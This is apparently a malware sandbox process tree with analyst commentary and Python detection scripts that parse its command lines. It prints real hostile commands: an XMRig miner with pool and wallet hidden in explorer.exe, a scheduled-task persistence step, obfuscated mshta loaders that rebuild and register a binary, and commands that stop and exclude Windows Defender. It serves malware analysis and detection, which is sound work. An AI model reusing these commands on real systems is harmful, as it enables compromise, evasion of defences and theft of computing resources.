C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01b537da2e0af175a.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01b537da2e0af175a.exeSat01b537da2e0af175a.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\A7nrtit\helpydn.exe"C:\Program Files (x86)\A7nrtit\helpydn.exe"14⤵
-
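The explorer.exe at depth 13 above, spawned alongside sihost64.exe under the conhost.exe that hosts services64.exe, carries a complete XMRig argument vector (RandomX `rx/0`, a nanopool endpoint over TLS, a 95-character Monero address with a worker suffix, a 30 percent thread cap). explorer.exe accepts none of these switches, so the miner code is running inside a hollowed or injected system image, and the `--cinit-*` options are not stock XMRig options but belong to the loader that wraps it; the two base64 values are opaque in the report and are left as such. The Python below is an added example, not part of the report or the sample: it parses that command line (copied verbatim) into the fields an analyst pivots on. The `SYSTEM_HOSTS` and `XMRIG_OPTIONS` sets are this example's own heuristics.

```python
import re

# Command line of the explorer.exe process at depth 13 above, copied verbatim from the report.
MINER_CMDLINE = (
    'C:\\Windows\\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 '
    '--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 '
    '--url=xmr-eu2.nanopool.org:14433 '
    '--user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password '
    '--pass= --cpu-max-threads-hint=30 '
    '--cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" '
    '--cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" '
    '--cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth'
)

# Windows images that accept none of these switches; miner options on their command line mean the
# image was hollowed or code was injected into it (heuristic list for this example, not exhaustive).
SYSTEM_HOSTS = {'explorer.exe', 'conhost.exe', 'svchost.exe', 'dllhost.exe', 'rundll32.exe'}

# Stock XMRig long options that occur in the line above; any other --option is a wrapper addition.
XMRIG_OPTIONS = {'algo', 'asm', 'cpu-memory-pool', 'randomx-mode', 'randomx-no-rdmsr',
                 'cuda-bfactor-hint', 'cuda-bsleep-hint', 'url', 'user', 'pass',
                 'cpu-max-threads-hint', 'tls'}

# Monero standard address (starts with 4) or subaddress (starts with 8): 95 base58 characters.
MONERO_ADDRESS_RE = re.compile(r'^[48][1-9A-HJ-NP-Za-km-z]{94}$')


def parse_cmdline(cmdline):
    """Return (program, options): --key=value -> options[key]=value, bare --key or -X -> True."""
    program, options = None, {}
    for tok in re.findall(r'"[^"]*"|\S+', cmdline):
        if tok.startswith('--'):
            key, sep, value = tok[2:].partition('=')
            options[key] = value.strip('"') if sep else True
        elif tok.startswith('-') and len(tok) == 2:
            options[tok[1:]] = True            # short flag such as -B (XMRig: run in background)
        elif program is None:
            program = tok.strip('"')
    return program, options


def summarize(cmdline):
    """Pull out what an analyst needs: host image, pool, wallet/worker, thread cap, non-XMRig switches."""
    program, opts = parse_cmdline(cmdline)
    host = program.rsplit('\\', 1)[-1].lower()
    pool_host, _, pool_port = opts.get('url', '').rpartition(':')
    wallet, _, worker = opts.get('user', '').partition('.')   # XMRig convention: address.worker
    return {
        'host_process': host,
        'injected_host': host in SYSTEM_HOSTS,
        'algo': opts.get('algo'),
        'pool_host': pool_host,
        'pool_port': int(pool_port) if pool_port.isdigit() else None,
        'tls': opts.get('tls') is True,
        'wallet': wallet,
        'wallet_valid': bool(MONERO_ADDRESS_RE.match(wallet)),
        'worker': worker,
        'cpu_max_threads_hint': int(opts['cpu-max-threads-hint']) if 'cpu-max-threads-hint' in opts else None,
        # everything that is not a stock XMRig option (short -B excluded): the wrapper's own switches
        'wrapper_flags': {k: v for k, v in opts.items() if k not in XMRIG_OPTIONS and len(k) > 1},
    }


if __name__ == '__main__':
    for key, value in summarize(MINER_CMDLINE).items():
        print(f'{key:22} {value}')
```

The pool host, port and wallet are the blockable and reportable indicators; the host image check turns the report's "explorer.exe with miner arguments" observation into a rule that fires whenever a system binary's command line contains `--url=` or `--user=` together with a pool port.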
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4028317.exe"C:\Users\Admin\AppData\Roaming\4028317.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\4921466.exe"C:\Users\Admin\AppData\Roaming\4921466.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\8999824.exe"C:\Users\Admin\AppData\Roaming\8999824.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\1775299.exe"C:\Users\Admin\AppData\Roaming\1775299.exe"9⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\8696436.exe"C:\Users\Admin\AppData\Roaming\8696436.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ("C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Roaming\8696436.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If """" == """" for %d in ( ""C:\Users\Admin\AppData\Roaming\8696436.exe"") do taskkill /im ""%~nXd"" -F " ,0 , TrUe))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Roaming\8696436.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If "" =="" for %d in ("C:\Users\Admin\AppData\Roaming\8696436.exe") do taskkill /im "%~nXd" -F11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "8696436.exe" -F12⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 2929⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
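The search_hyperfs_206.exe chain above (depth 8 to 14) is the mshta/cmd loader pattern that recurs throughout this tree. mshta runs an inline `vbscript:` that spawns cmd; cmd copies the dropper to a randomly named file in the parent directory, starts the copy with a random `/switch`, and, only when its own argument is empty (`If ""==""`), kills the original image by name through `for %M in (...) do taskkill`. The second stage, started with the switch, fails that guard (`If "/PLQtzfgO0m8dRv4iYALOqi "==""`) and skips the kill; instead it writes the two bytes `MZ` with `echo|set /p`, appends six dropped fragments with `copy /b` (one of them, TRMBiI66.CU, the same command line writes with `echo`), deletes the fragments and loads the result with `msiexec -Y`, which calls the module's DllRegisterServer. The mixed case only defeats naive string matching; cmd is case-insensitive. The Python below is an added example, not part of the report or the sample: it normalises the two cmd command lines from this chain (copied verbatim) and extracts the copy, start, self-kill, header-stub, reassembly and register steps so the same logic can run over process-creation logs. The regex names and the `ChainReport` fields are this example's own.

```python
import re
from dataclasses import dataclass, field

# Two cmd.exe command lines copied verbatim from the chain above: the depth-10 copy/start/taskkill
# stage and the depth-13 reassembly stage.
CMD_COPY_START_KILL = (
    '"C:\\Windows\\System32\\cmd.exe" /R cOpY /Y '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\search_hyperfs_206.exe" ..\\kPBhgOaGQk.exe'
    '&&sTart ..\\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in '
    '("C:\\Users\\Admin\\AppData\\Local\\Temp\\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"'
)
CMD_REASSEMBLE = (
    '"C:\\Windows\\system32\\cmd.exe" /R EcHO UwC:\\Users\\Admin\\AppData\\Local\\TempNnML~>TRMBiI66.CU '
    '& EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu '
    '+WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\\LXQ2G.WC& Del /q *&starT msiexec -Y ..\\lXQ2g.WC'
)

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
SWITCH_RE = re.compile(r'/[a-z]$', re.I)                                  # /Y /b /q and the like
FOR_TASKKILL_RE = re.compile(r'for\s+%\w\s+in\s*\(\s*"([^"]*)"\s*\)\s*do\s+taskkill', re.I)
IF_GUARD_RE = re.compile(r'if\s+"([^"]*)"\s*==\s*"([^"]*)"', re.I)
PE_STUB_RE = re.compile(r'set\s*/p\s*=?\s*"([^"]*)"\s*>\s*(\S+)', re.I)   # echo|set /p ="MZ" >file
ECHO_WRITE_RE = re.compile(r'echo\s+(.*?)\s*>\s*(\S+)$', re.I)

@dataclass
class ChainReport:
    copies: list = field(default_factory=list)   # (sources, destination, binary_mode)
    starts: list = field(default_factory=list)   # (program, arguments)
    writes: list = field(default_factory=list)   # (text, file) from echo text >file
    deletes: list = field(default_factory=list)
    pe_stub: tuple = None                        # (literal, file) written with set /p, here the MZ magic
    self_kill: str = None                        # path whose image name is fed to taskkill
    kill_guard_true: bool = True                 # does the if "a"=="b" in front of it hold?
    dll_register: str = None                     # module passed to msiexec /y (calls DllRegisterServer)

def split_chain(cmdline):
    """Split on & and && outside double quotes; drop the leading cmd.exe token and its /R /C /Q /S /D."""
    segments, buf, in_quotes, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
        if ch == '&' and not in_quotes:
            segments.append(''.join(buf).strip())
            buf = []
            if cmdline.startswith('&&', i):
                i += 1
        else:
            buf.append(ch)
        i += 1
    segments.append(''.join(buf).strip())
    segments = [s for s in segments if s]
    head = TOKEN_RE.findall(segments[0])
    if head and head[0].strip('"').lower().endswith('cmd.exe'):
        head = head[1:]
        while head and head[0].lower() in ('/r', '/c', '/q', '/s', '/d'):
            head = head[1:]
        segments[0] = ' '.join(head)
    return segments

def _operands(tokens):
    """copy/start operands: drop single-letter switches, split unquoted tokens on the copy '+' joiner."""
    out = []
    for tok in tokens:
        if SWITCH_RE.fullmatch(tok):
            continue
        if tok.startswith('"'):
            out.append(tok.strip('"'))
        else:
            out.extend(p.strip() for p in tok.split('+') if p.strip())
    return out

def analyze_chain(cmdline):
    rep = ChainReport()
    for seg in split_chain(cmdline):
        tokens = TOKEN_RE.findall(seg)
        verb = tokens[0].lower()                 # cmd builtins are case-insensitive
        if verb == 'copy':
            names = _operands(tokens[1:])
            rep.copies.append((names[:-1], names[-1], any(t.lower() == '/b' for t in tokens)))
        elif verb == 'start':
            ops = [t for t in tokens[1:] if t != '""' and not SWITCH_RE.fullmatch(t)]
            rep.starts.append((ops[0], ' '.join(ops[1:])))
            if ops[0].lower() in ('msiexec', 'msiexec.exe') and len(ops) > 2 and ops[1].lower() in ('-y', '/y'):
                rep.dll_register = ops[2]
        elif verb == 'echo':
            stub, write = PE_STUB_RE.search(seg), ECHO_WRITE_RE.match(seg)
            if stub:
                rep.pe_stub = (stub.group(1), stub.group(2))
            elif write:
                rep.writes.append((write.group(1), write.group(2)))
        elif verb == 'del':
            rep.deletes.append(' '.join(t for t in tokens[1:] if not SWITCH_RE.fullmatch(t)))
        kill = FOR_TASKKILL_RE.search(seg)
        if kill:
            guard = IF_GUARD_RE.match(seg)
            rep.self_kill = kill.group(1)
            rep.kill_guard_true = guard is None or guard.group(1) == guard.group(2)
    return rep

if __name__ == '__main__':
    for line in (CMD_COPY_START_KILL, CMD_REASSEMBLE):
        print(analyze_chain(line))
```

A `copy /b` whose first source is a file that was just created with `set /p ="MZ"`, followed by `msiexec /y` (or `regsvr32`, `rundll32`) on the destination, is the detection to keep: it does not depend on the random file names, the case mangling or the mshta wrapper, all of which change between samples.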
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 6169⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat0188dba58af938.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat0188dba58af938.exeSat0188dba58af938.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe"C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\3dMI4Si0Juc8JmYItUK1_bOX.exe"C:\Users\Admin\Pictures\Adobe Films\3dMI4Si0Juc8JmYItUK1_bOX.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 3968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
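3dMI4Si0Juc8JmYItUK1_bOX.exe above is flagged for SetThreadContext and its only child is AppLaunch.exe with an empty command line; Vgb9MSUHJnGgHNOrMsbi_BKX.exe at depth 7 further down does the same, and Vnbdvi08mAvQMZ57cLQirs_r.exe spawns RegAsm.exe with the literal command line `#cmd`. That is the process-hollowing sequence: create the Microsoft-signed .NET utility suspended, overwrite its image, point the main thread at the new entry with SetThreadContext, resume. The .NET tools are picked because they are signed and live under C:\Windows; a genuine invocation of them normally carries an assembly path or switches, never nothing or a placeholder. The Python below is an added example, not part of the report: it scores .NET-utility children on empty or placeholder arguments, a parent running from a user-writable path, and the parent's SetThreadContext flag, over events modelled on the tree (images and command lines are copied from it; PIDs are constructed because the report does not show them, and the msiexec/RegAsm rows are a constructed benign control).

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    set_thread_context: bool = False   # the report's "Suspicious use of SetThreadContext" flag


# Events modelled on the tree above: images and command lines are copied from it, PIDs are constructed
# because the report does not show them. The last two rows are a constructed benign control.
EVENTS = [
    ProcEvent(100, 1, r'C:\Users\Admin\Pictures\Adobe Films\3dMI4Si0Juc8JmYItUK1_bOX.exe',
              r'"C:\Users\Admin\Pictures\Adobe Films\3dMI4Si0Juc8JmYItUK1_bOX.exe"', True),
    ProcEvent(101, 100, r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe',
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"'),
    ProcEvent(200, 1, r'C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe',
              r'"C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"', True),
    ProcEvent(201, 200, r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe', '#cmd'),
    ProcEvent(300, 1, r'C:\Windows\System32\msiexec.exe', r'C:\Windows\System32\msiexec.exe /V'),
    ProcEvent(301, 300, r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe',
              r'RegAsm.exe "C:\Program Files\Acme\Acme.Interop.dll" /codebase'),
]

DOTNET_UTILITIES = {'applaunch.exe', 'regasm.exe', 'regsvcs.exe', 'installutil.exe', 'msbuild.exe'}
USER_WRITABLE_RE = re.compile(r'^[a-z]:\\(?:users|programdata)\\', re.I)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def operands(cmdline, image):
    """Command-line tokens after the program token (dropped whether it is quoted or bare)."""
    tokens = TOKEN_RE.findall(cmdline)
    if tokens and basename(tokens[0].strip('"')) == basename(image):
        tokens = tokens[1:]
    return tokens


def placeholder_arguments(args):
    """Empty, or one short token without path characters (such as '#cmd'): not a real invocation."""
    return not args or (len(args) == 1 and len(args[0]) <= 8 and not re.search(r'[\\/.:]', args[0]))


def score_events(events):
    """Flag .NET utilities whose launch looks like a hollowing host rather than a real tool run."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) not in DOTNET_UTILITIES:
            continue
        parent = by_pid.get(e.ppid)
        score, reasons = 0, []
        if placeholder_arguments(operands(e.cmdline, e.image)):
            score, reasons = score + 2, reasons + ['no real arguments']
        if parent and USER_WRITABLE_RE.match(parent.image):
            score, reasons = score + 2, reasons + ['parent runs from a user-writable directory']
        if parent and parent.set_thread_context:
            score, reasons = score + 3, reasons + ['parent flagged for SetThreadContext']
        if score >= 4:   # two weak signals, or the API flag plus one more
            findings.append({'pid': e.pid, 'child': basename(e.image),
                             'parent': basename(parent.image) if parent else None,
                             'score': score, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for finding in score_events(EVENTS):
        print(finding)
```

On a real endpoint the SetThreadContext signal comes from an EDR or Sysmon-style API telemetry rather than a sandbox flag; the argument and parent-path checks alone still catch both cases in the tree while leaving the msiexec-launched RegAsm untouched.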
C:\Users\Admin\Pictures\Adobe Films\pcDa6JJRRSX5ENuJg_ClL7Id.exe"C:\Users\Admin\Pictures\Adobe Films\pcDa6JJRRSX5ENuJg_ClL7Id.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cf7e211a-c11f-4071-99b2-1e8cfe44935c\test.bat"9⤵
-
C:\Windows\system32\sc.exesc stop windefend10⤵
-
C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe" -Force8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 4008⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\HhHYpWjRp4fWvBG9HSpLlEXd.exe"C:\Users\Admin\Pictures\Adobe Films\HhHYpWjRp4fWvBG9HSpLlEXd.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\x_NIOasvKYPQ56cpcMhnsHLe.exe"C:\Users\Admin\Pictures\Adobe Films\x_NIOasvKYPQ56cpcMhnsHLe.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\fx6ZjM_T3TYXA8Vgl8TM4_N8.exe"C:\Users\Admin\Pictures\Adobe Films\fx6ZjM_T3TYXA8Vgl8TM4_N8.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 2888⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"7⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\soldd.exe"C:\Users\Admin\AppData\Local\Temp\soldd.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
